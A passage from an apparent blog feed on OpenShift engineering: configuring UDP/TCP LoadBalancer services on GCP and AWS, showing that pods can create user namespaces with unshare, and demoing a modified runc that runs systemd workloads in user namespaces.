<span id="cb7-17"><a href="#cb7-17" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-tcp</span></span>
<span id="cb7-18"><a href="#cb7-18" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb7-19"><a href="#cb7-19" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb7-20"><a href="#cb7-20" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb7-21"><a href="#cb7-21" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb7-22"><a href="#cb7-22" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb7-23"><a href="#cb7-23" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> tcpecho</span></span>
<span id="cb7-24"><a href="#cb7-24" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb7-25"><a href="#cb7-25" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<p>Creating the objects now succeeds:</p>
<pre class="shell"><code>% oc create -f service-echo.yaml 
service/echo-udp created
service/echo-tcp created</code></pre>
<p>To find out the hostname or IP address of the load balancer ingress
endpoint, inspect the <code>status</code> field of the Service object:</p>
<pre class="shell"><code>% oc get -o json service \
    | jq -c &#39;.items[] | (.metadata.name, .status)&#39;
&quot;echo-tcp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;ip&quot;:&quot;34.136.55.93&quot;}]}}
&quot;echo-udp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;ip&quot;:&quot;34.71.82.205&quot;}]}}</code></pre>
<p>Most cloud providers report an IP address. That includes Google
Cloud (GCP) where this cluster was deployed. On the other hand, AWS
reports a DNS name. Below is the result of creating my service
objects on an cluster hosted on AWS:</p>
<pre class="shell"><code>% oc get -o json service \
    | jq -c &#39;.items[] | (.metadata.name, .status)&#39;
&quot;echo-tcp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;hostname&quot;:&quot;a095e8e1ebb9e4c64ae71e0f3c688ad4-608097611.us-east-2.elb.amazonaws.com&quot;}]}}
&quot;echo-udp&quot;
{&quot;loadBalancer&quot;:{}}</code></pre>
<p>ELB successfully created a load balancer for the TCP port. But
something is wrong with the UDP service. The events give more
information:</p>
<pre class="shell"><code>% oc get event --field-selector involvedObject.name=echo-udp
LAST SEEN   TYPE      REASON                   OBJECT             MESSAGE
94s         Normal    EnsuringLoadBalancer     service/echo-udp   Ensuring load balancer
94s         Warning   SyncLoadBalancerFailed   service/echo-udp   Error syncing load balancer: failed to ensure load balancer: Protocol UDP not supported by LoadBalancer</code></pre>
<p>Load balancer creation failed with the error:</p>
<blockquote>
<p>Error syncing load balancer: failed to ensure load balancer:
Protocol UDP not supported by LoadBalancer</p>
</blockquote>
<p>The workaround is to add an annotation to request a <em>Network Load
Balancer (NLB)</em> instance instead of ELB (the default):</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb12-1"><a href="#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb12-2"><a href="#cb12-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb12-3"><a href="#cb12-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb12-4"><a href="#cb12-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-udp</span></span>
<span id="cb12-5"><a href="#cb12-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb12-6"><a href="#cb12-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">service.beta.kubernetes.io/aws-load-balancer-type</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;nlb&quot;</span></span>
<span id="cb12-7"><a href="#cb12-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb12-8"><a href="#cb12-8" aria-hidden="true" tabindex="-1"></a><span class="at">  …</span></span></code></pre></div>
<p>After adding the annotation, both load balancers are configured:</p>
<pre class="shell"><code>% oc get -o json service \
    | jq -c &#39;.items[] | (.metadata.name, .status)&#39;
&quot;echo-tcp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;hostname&quot;:&quot;a473cf621de6b49dfabb6e933d0fab55-2099420434.us-east-2.elb.amazonaws.com&quot;}]}}
&quot;echo-udp&quot;
{&quot;loadBalancer&quot;:{&quot;ingress&quot;:[{&quot;hostname&quot;:&quot;af7f7ed0f44c9461dbb54a9a4aedca2c-0c5861432365c726.elb.us-east-2.amazonaws.com&quot;}]}}</code></pre>
<div class="note">
<p><code>aws-load-balancer-type</code> is one of several annotations for modifying
AWS load balancer configuration. See the <a href="https://cloud-provider-aws.sigs.k8s.io/service_controller/">AWS Cloud Provider
documentation</a> for the full list.</p>
</div>
<h2 id="testing-the-ingress">Testing the ingress <a href="#testing-the-ingress" class="section">§</a></h2>
<p>Using the IP address or DNS name from the <code>status</code> field, you can
use <code>nc(1)</code> to verify that the server is contactable.</p>
<pre class="shell"><code>% echo hello | nc 34.136.55.93 12345
HELLO

% nc --udp 34.71.82.205 12345
hello                             -- input
HELLO                             -- response
^D</code></pre>
<p>I was able to talk to my echo server via both TCP and UDP.</p>
<div class="note">
<p>If using TLS or DTLS, you could instead use OpenSSL’s <code>s_client(1)</code>
to test connectivity.</p>
</div>
<p>Use hostname instead of IP address if that is how the cloud provider
reports the ingress endpoint.</p>
<h2 id="reaching-the-service-via-dns">Reaching the service via DNS <a href="#reaching-the-service-via-dns" class="section">§</a></h2>
<p>The cloud provider has set up the load balancer and the ingress IP
addresses or hostnames are reported in the <code>status</code> field of the
Service object(s). Now you probably wish to set up DNS records so
that clients can use an established domain name to find the server.</p>
<p>I can’t go deep into this topic in this post, because I am still
exploring this problem space myself. But I can describe some
possible solutions at a high level.</p>
<p>One possibility is to teach your application controller to manage
the required DNS records. It would monitor the Service objects and
reconcile the external DNS configuration with what it sees. The
number and kind of records to be created will vary depending on
whether the cloud providers reports the ingress points as hostnames
or IP addresses:</p>
<table>
<thead>
<tr class="header">
<th>Ingress endpoint</th>
<th>Resolution method</th>
<th>Records needed</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td><code>hostname</code></td>
<td>direct</td>
<td><code>CNAME</code></td>
</tr>
<tr class="even">
<td><code>hostname</code></td>
<td>SRV</td>
<td><code>SRV</code></td>
</tr>
<tr class="odd">
<td><code>ip</code></td>
<td>direct</td>
<td><code>A</code>/<code>AAAA</code></td>
</tr>
<tr class="even">
<td><code>ip</code></td>
<td>SRV</td>
<td><code>A</code>/<code>AAAA</code> and <code>SRV</code></td>
</tr>
</tbody>
</table>
<p>Most applications have similar needs, so it would make sense to
encapsulate this behaviour in a controller that configures arbitrary
external DNS providers. That’s what the Kubernetes <a href="https://github.com/kubernetes-sigs/external-dns">ExternalDNS</a>
project is all about. <a href="https://github.com/kubernetes-sigs/external-dns#status-of-providers">Provider stability varies</a>; at
time of writing the only <em>stable</em> providers are Google Cloud DNS and
AWS Route 53.</p>
<p>Integration with OpenShift is via the <a href="https://github.com/openshift/external-dns-operator">ExternalDNS Operator</a>.
This is an active area of work and ExternalDNS will hopefully be an
officially supported part of OpenShift in a future release.</p>
<p>I haven’t actually played with ExternalDNS yet so can’t say much
more about it at this time. Only that it looks like a very useful
solution!</p>
<p>Finally, recall the caveats I mentioned earlier about applications
that require ingress of <strong>both TCP and UDP</strong> traffic. <a href="https://github.com/kubernetes/enhancements/issues/1435">KEP 1435</a>,
along with cloud provider support, should resolve this issue
eventually.</p>]]></summary>
</entry>
<entry>
    <title>Creating user namespaces inside containers</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-10-15-openshift-userns-in-container.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-10-15-openshift-userns-in-container.html</id>
    <published>2021-10-15T00:00:00Z</published>
    <updated>2021-10-15T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="creating-user-namespaces-inside-containers">Creating user namespaces inside containers</h1>
<p>Over the last year I have experimented with user namespace support in
OpenShift. That is, making OpenShift run workloads inside a
separate user namespace. We’re trying to drive this feature
forward, but some people have reservations. Does having processes
running as <code>root</code> inside a user namespace present an increased
security risk? What if there are kernel bugs…</p>
<p>If you’re worried about the security of user namespaces, OpenShift
or Kubernetes user namespace support doesn’t change the game at all.
As I demonstrate in this post, you can create and use user
namespaces <em>inside</em> your workloads right now.</p>
<h2 id="demo">Demo <a href="#demo" class="section">§</a></h2>
<p>I tested on OpenShift 4.9.0 in the default configuration. So, no
explicit user namespace support. I used a stock Fedora container
image with the following Pod spec:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:34-x86_64</span></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">capabilities</span><span class="kw">:</span></span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">drop</span><span class="kw">:</span></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> CHOWN</span></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> DAC_OVERRIDE</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> FOWNER</span></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> FSETID</span></span>
<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> SETPCAP</span></span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> NET_BIND_SERVICE</span></span></code></pre></div>
<p>The Pod will run under the <code>restricted</code> SCC. I explicitly drop a
number of default capabilities.</p>
<p>Next I created a project named <code>userns</code>, and new user <code>me</code>.</p>
<pre class="shell"><code>% oc new-project userns
Now using project &quot;userns&quot; on server &quot;https://api.ci-ln-cih2n32-f76d1.origin-ci-int-gce.dev.openshift.com:6443&quot;.

You can add applications to this project with the &#39;new-app&#39; command. For example, try:

    oc new-app rails-postgresql-example

to build a new example application in Ruby. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=k8s.gcr.io/serve_hostname

% oc create user me
user.user.openshift.io/me created

% oc adm policy add-role-to-user edit me
clusterrole.rbac.authorization.k8s.io/edit added: &quot;me&quot;</code></pre>
<p>Operating as <code>me</code> I created the pod:</p>
<pre class="shell"><code>% oc --as me create -f pod-fedora.yaml
pod/fedora created</code></pre>
<p>Soon after, the pod is running. I can see what node it is running
on, and its CRI-O container ID:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
    | jq &#39;.status.phase,
          .spec.nodeName,
          .status.containerStatuses[0].containerID&#39;
&quot;Running&quot;
&quot;ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr&quot;
&quot;cri-o://d164163951604b7fc9506b3a390ec6a14c76dc6077406fc7b5ffcbf81c406f68&quot;</code></pre>
<p>Next I started a shell in my container. I’ll leave it running for
now, and come back to it later:</p>
<pre class="shell"><code>% oc exec -it pod/fedora /bin/sh
sh-5.1$</code></pre>
<p>In another terminal, I opened a debug shell on the worker node.
Then I used <code>crictl</code> to find out the process ID (<code>pid</code>) of the main
container process.</p>
<pre class="shell"><code>% oc debug node/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr
Starting pod/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.4# chroot /host
sh-4.4# crictl inspect d1641639 | jq .info.pid
18668</code></pre>
<p>Next I used <code>pgrep</code> to find all the processes that share the same
set of namespaces as process <code>18668</code>. In other words, processes
running in the same pod sandbox.</p>
<pre class="shell"><code>sh-4.4# pgrep --ns 18668 \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh</code></pre>
<p>There are two processes, running under an unpriviled UID. The UID
comes from a unique range allocated for the <code>userns</code> project. These
two processes are the main container process (<code>sleep</code>), and the
shell that I exected a few steps ago. As expected.</p>
<p>Now for the fun part. Back to the shell we opened in <code>pod/fedora</code>.
Observe that this shell process has an empty capability set:</p>
<pre class="shell"><code>sh-5.1$ grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000000000000000
CapAmb: 0000000000000000</code></pre>
<p>And yet, using <code>unshare(1)</code> I was able to create a new user
namespace. The <code>-r</code> option says to map <code>root</code> in the new user
namespace to the user that created the namespace. And that is
indeed what happens:</p>
<pre class="shell"><code>sh-5.1$ unshare -U -r
[root@fedora /]# id
uid=0(root) gid=0(root) groups=0(root),65534(nobody)</code></pre>
<p>I confirmed it via the node debug shell. I ran <code>pgrep</code> again, this
time restricting the search to processes in the same <code>pid</code> namespace
as process <code>18668</code>. The <code>--nslist</code> option gives the list of
namespaces to match (all namespaces when not specified).</p>
<pre class="shell"><code>sh-4.4# pgrep --ns 18668 --nslist pid \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh
1000580+   36704 -sh</code></pre>
<p>The new shell has pid <code>36704</code>. Observe that UID <code>0</code> in the
container maps to UID <code>1000580000</code>:</p>
<pre class="shell"><code>sh-4.4# cat /proc/36704/uid_map
         0 1000580000          1</code></pre>
<h2 id="discussion">Discussion <a href="#discussion" class="section">§</a></h2>
<p>You can create and use user namespaces inside your containers
without any special support from OpenShift or Kubernetes.
Therefore, the idea of a OpenShift or Kubernetes feature for running
a workload in an isolated user namespace <em>by default</em> does not lead
to an increased risk of container escapes or privilege escalation
related to processes running as uid 0 in a user namespace.</p>
<p>This is not to gloss over the fact that other parts of a “workloads
in user namespaces” feature have to be designed and implemented with
care. Particular aspects include pod admission and selection of the
unprivileged UIDs to map to. But on the question of the security of
the Linux user namespaces feature itself, a first class OpenShift of
Kubernetes feature doesn’t introduce any new risk. Whatever risk
there is, is there right now.</p>
<p>If some critical security with user namespaces emerges and you need
an urgent mitigation, the only option is to alter the container
runtime Seccomp policies to block the <code>unshare(2)</code> syscall. This is
an advanced topic, involving changes to node configuration. For
details, see <a href="https://docs.openshift.com/container-platform/4.8/security/seccomp-profiles.html"><em>Configuring seccomp profiles</em></a> in the
official OpenShift documentation.</p>]]></summary>
</entry>
<entry>
    <title>Demo: namespaced systemd workloads on OpenShift</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-07-22-openshift-systemd-workload-demo.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-07-22-openshift-systemd-workload-demo.html</id>
    <published>2021-07-22T00:00:00Z</published>
    <updated>2021-07-22T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="demo-namespaced-systemd-workloads-on-openshift">Demo: namespaced systemd workloads on OpenShift</h1>
<p>I have spent much of the last year diving deep into OpenShift’s
container runtime. The goal: work out how to run systemd-based
workloads in <em>user namespaces</em> on OpenShift nodes. The exploration
took many twists and turns. But finally, I have achieved the goal.</p>
<p>In this post I recap the journey so far, and
<a href="#demo"><strong>demonstrate</strong></a> what I have achieved. Then I will
summarise the path(s?) forward from here.</p>
<h2 id="the-journey-so-far">The journey so far <a href="#the-journey-so-far" class="section">§</a></h2>
<p>My <a href="2021-07-21-freeipa-on-openshift-update.html">previous post</a>
gives an overview of the FreeIPA on OpenShift project. In
particular, it explains our decision to use a “monolithic”
systemd-based container. That implementation approach exposed
capability gaps in OpenShift and led to a long running series of
investigations. I wrote up the results of these investigations
across several blog posts, summarised here:</p>
<h3 id="openshift-and-user-namespaces"><a href="2020-11-05-openshift-user-namespace.html"><em>OpenShift and user namespaces</em></a> <a href="#openshift-and-user-namespaces" class="section">§</a></h3>
<p>I observed that OpenShift (4.6 at the time) did not isolate
containers in user namespaces. I noted that <a href="https://github.com/kubernetes/enhancements/issues/127">KEP-127</a> proposes
user namespace support for Kubernetes (it is <a href="https://github.com/kubernetes/enhancements/pull/2101">still being worked
on</a>). CRI-O
had also recently <a href="https://github.com/cri-o/cri-o/pull/3944">added
support</a> for user
namespaces via annotations.</p>
<h3 id="user-namespaces-in-openshift-via-cri-o-annotations"><a href="2020-12-01-openshift-crio-userns.html"><em>User namespaces in OpenShift via CRI-O annotations</em></a> <a href="#user-namespaces-in-openshift-via-cri-o-annotations" class="section">§</a></h3>
<p>I tested CRI-O’s annotation-based user namespace support on
OpenShift 4.7 nightlies. I found that the runtime creates a sandbox
with a user namespace and the expected UID mappings. I also found
that it is necessary to override the <code>net.ipv4.ping_group_range</code>
sysctl. Also, the SCC enforcement machinery does not know about
user namespaces and therefore the account that creates the container
requires the <code>anyuid</code> SCC. These deficiencies still exist today.</p>
<h3 id="user-namespace-support-in-openshift-4.7"><a href="2021-03-03-openshift-4.7-user-namespaces.html"><em>User namespace support in OpenShift 4.7</em></a> <a href="#user-namespace-support-in-openshift-4.7" class="section">§</a></h3>
<p>I continued my investigation after the release of OpenShift 4.7.
With the aforementioned caveats, user namespaces work. I also noted
an inconsistent treatment of <code>securityContext</code>: specifying
<code>runAsUser</code> in the <code>PodSpec</code> maps the container’s UID <code>0</code> to host
UID <code>0</code>—a dangerous configuration.</p>
<p>More recently, I noticed that the <code>userns-mode</code> annotation I was
using included <code>map-to-root=true</code>. I now understand that it is this
configuration that causes this mapping behaviour. I no longer
consider it particularly serious. Ideally the SCC enforcement
should learn about user namespaces, and prevent unprivileged users
from creating containers that run as <code>root</code> (or other system
accounts) on the host.</p>
<h3 id="multiple-users-in-user-namespaces-on-openshift"><a href="2021-03-10-openshift-user-namespace-multi-user.html"><em>Multiple users in user namespaces on OpenShift</em></a> <a href="#multiple-users-in-user-namespaces-on-openshift" class="section">§</a></h3>
<p>I verified that workloads that run processes under a variety of user
accounts work as expected in user namespaces. I did not use a
<em>systemd</em>-based workload to verify this.</p>
<h3 id="systemd-containers-on-openshift-with-cgroups-v2"><a href="2021-03-30-openshift-cgroupv2-systemd.html"><em>systemd containers on OpenShift with cgroups v2</em></a> <a href="#systemd-containers-on-openshift-with-cgroups-v2" class="section">§</a></h3>
<p>I observed that systemd-based workloads run successfully in
OpenShift when executed as UID 0 <em>on the host</em>. Such containers can
only be created by accounts granted privileged SCCs (e.g. <code>anyuid</code>).
When running the container under other UIDs, <em>systemd</em> can’t run
because it does not have write permission on the container’s cgroup
directory.</p>
<h3 id="using-runc-to-explore-the-oci-runtime-specification"><a href="2021-05-27-oci-runtime-spec-runc.html"><em>Using <code>runc</code> to explore the OCI Runtime Specification</em></a> <a href="#using-runc-to-explore-the-oci-runtime-specification" class="section">§</a></h3>
<p>I investigated how <code>runc</code> (the OCI runtime used in OpenShift)
operates, and how it creates cgroups. I identified some potential
ways to change the ownership of the container cgroup to the
<em>container’s</em> UID 0.</p>
<h3 id="systemd-cgroups-and-subuid-ranges"><a href="2021-06-09-systemd-cgroups-subuid.html"><em>systemd, cgroups and subuid ranges</em></a> <a href="#systemd-cgroups-and-subuid-ranges" class="section">§</a></h3>
<p>I discovered that the systemd <em>transient unit API</em> (which <code>runc</code>
uses to create container cgroups) allows specifying a different
owner for the new cgroup. Unfortunately, the user must be “known”,
in the form of a <code>passwd</code> entity via NSSwitch. A <a href="https://github.com/systemd/systemd/issues/19781">proposal to relax
this requirement</a>
was provisionally rejected. Other approaches include writing an
NSSwitch module to synthesise <code>passwd</code> entities for subuids, or
modifying <code>runc</code> to <code>chown(2)</code> the container cgroup after systemd
creates it. I decided to experiment with the latter approach.</p>
<h2 id="modifying-runc-to-chown-the-container-cgroup">Modifying <code>runc</code> to <code>chown</code> the container cgroup <a href="#modifying-runc-to-chown-the-container-cgroup" class="section">§</a></h2>
<p>The main challenge in modifying <code>runc</code> was getting my head around
the unfamiliar codebase. The actual operations are straightforward.
There are two main aspects.</p>
<p>The first aspect is to compute the appropriate owner UID for the
cgroup, and tell it to the cgroup manager object. I <a href="2021-06-09-systemd-cgroups-subuid.html#determining-the-uid">described the
algorithm</a> in a previous post. The <code>config.HostRootUID()</code> method
already implements this computation. I was able to reuse it.</p>
<p>The second aspect is to actually <code>chown(2)</code> the relevant cgroup
files and directories. I previously observed systemd’s behaviour
when creating units owned by arbitrary users. systemd <code>chown</code>s the
container’s cgroup directory, and the <code>cgroup.procs</code>,
<code>cgroup.subtree_control</code> and <code>cgroup.threads</code> files within that
directory. <code>runc</code> will do the same. The cgroup manager object
already knows the path to the container cgroup directory. It
changes the owner of the directory and same three files as <em>systemd</em>
to the relevant user.</p>
<h2 id="demo">Demo <a href="#demo" class="section">§</a></h2>
<p>Following is a step-by-step demonstration starting with a fresh
deployment of OpenShift <code>4.7.20</code>.</p>
<pre class="shell"><code>% oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.7.20    True        False         8m52s   Cluster version is 4.7.20</code></pre>
<div class="note">
<p>There is a <a href="https://github.com/cri-o/cri-o/issues/5077">regression</a>
in OpenShift 4.8.0 that prevents Pod annotations from being propagated
to container OCI configurations. As a consequence, <code>runc</code> does not
receive the annotations that trigger the experimental behaviour. I
filed a <a href="https://github.com/cri-o/cri-o/pull/5078">pull request</a>
that fixes the issue. The patch was accepted and the fix released
in OpenShift 4.8.4.</p>
</div>
<p>The latent credential is the cluster <code>admin</code> user. Where relevant,
I use the <code>oc --as USER</code> option to execute commands as other users.</p>
<pre class="shell"><code>% oc whoami
system:admin</code></pre>
<h3 id="install-modified-runc-package">Install modified <code>runc</code> package <a href="#install-modified-runc-package" class="section">§</a></h3>
<p>List the nodes in the cluster:</p>
<pre class="shell"><code>% oc get node
NAME                                       STATUS   ROLES    AGE   VERSION
ci-ln-jqbnbfk-f76d1-gnkkv-master-0         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-1         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-2         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-b-dxk6k   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w   Ready    worker   52m   v1.20.0+01c9f3f</code></pre>
<p>For each worker node, open a node debug shell and use <code>rpm-ostree override replace</code> to install the modified <code>runc</code> (one worker shown):</p>
<pre class="shell"><code>% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree override replace https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading &#39;https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm&#39;... done!
Checking out tree 9767154... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-96.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-990.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<div class="note">
<p>Instead of installing the modified <code>runc</code> on all worker nodes, you
could update one node and use <code>.spec.nodeAffinity</code> in the <code>PodSpec</code>
to force the pod to run on that node.</p>
</div>
<p>Don’t worry about the restart right now (it will happen in the next
step). Exit the debug shell:</p>
<pre class="shell"><code>sh-4.4# exit
sh-4.2# exit

Removing debug pod ...</code></pre>
<h3 id="enable-user-namespaces-and-cgroups-v2">Enable user namespaces and cgroups v2 <a href="#enable-user-namespaces-and-cgroups-v2" class="section">§</a></h3>
<p>The following <code>MachineConfig</code> enables cgroups v2 and CRI-O
annotation-based user namespace support:</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> machineconfiguration.openshift.io/v1</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> MachineConfig</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">machineconfiguration.openshift.io/role</span><span class="kw">:</span><span class="at"> worker</span></span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> userns-cgv2</span></span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">kernelArguments</span><span class="kw">:</span></span>
<span id="cb6-9"><a href="#cb6-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> systemd.unified_cgroup_hierarchy=1</span></span>
<span id="cb6-10"><a href="#cb6-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> cgroup_no_v1=&quot;all&quot;</span></span>
<span id="cb6-11"><a href="#cb6-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> psi=1</span></span>
<span id="cb6-12"><a href="#cb6-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">config</span><span class="kw">:</span></span>
<span id="cb6-13"><a href="#cb6-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ignition</span><span class="kw">:</span></span>
<span id="cb6-14"><a href="#cb6-14" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">version</span><span class="kw">:</span><span class="at"> </span><span class="fl">3.1.0</span></span>
<span id="cb6-15"><a href="#cb6-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">storage</span><span class="kw">:</span></span>
